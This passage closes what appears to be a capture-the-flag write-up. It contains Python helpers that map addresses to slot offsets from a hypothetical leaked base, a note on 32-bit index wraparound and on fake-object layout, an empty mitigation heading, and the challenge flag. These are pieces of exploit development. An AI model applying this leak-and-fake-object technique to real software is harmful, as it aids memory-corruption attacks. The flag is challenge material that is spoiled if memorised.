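    return (((addr - base_addr) >> SLOT_SHIFT) + base_offset) & 0xFFFFFFFF

def offset2addr(offset, base_addr, base_offset):
    """Slot index -> address (inverse of addr2offset for in-range indices)."""
    return ((offset - base_offset) << SLOT_SHIFT) + base_addr

base_addr = 0x55550000A000  # hypothetical leaked address
base_offset = 0x1F8         # hypothetical slot index of that address

addr = base_addr + 0x340
off = addr2offset(addr, base_addr, base_offset)
print(hex(off), hex(offset2addr(off, base_addr, base_offset)))

# An address far enough below the base wraps to a large unsigned 32-bit index.
below = addr2offset(base_addr - 0x2000, base_addr, base_offset)
print(hex(below))
```

The 16-byte granularity is consistent with the fake objects the template writes into the blob, each of which occupies 4 + 4 + 8 bytes.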

Mitigation

Flag

CSCG{t3chnic4lly_an_0d4y_but_...}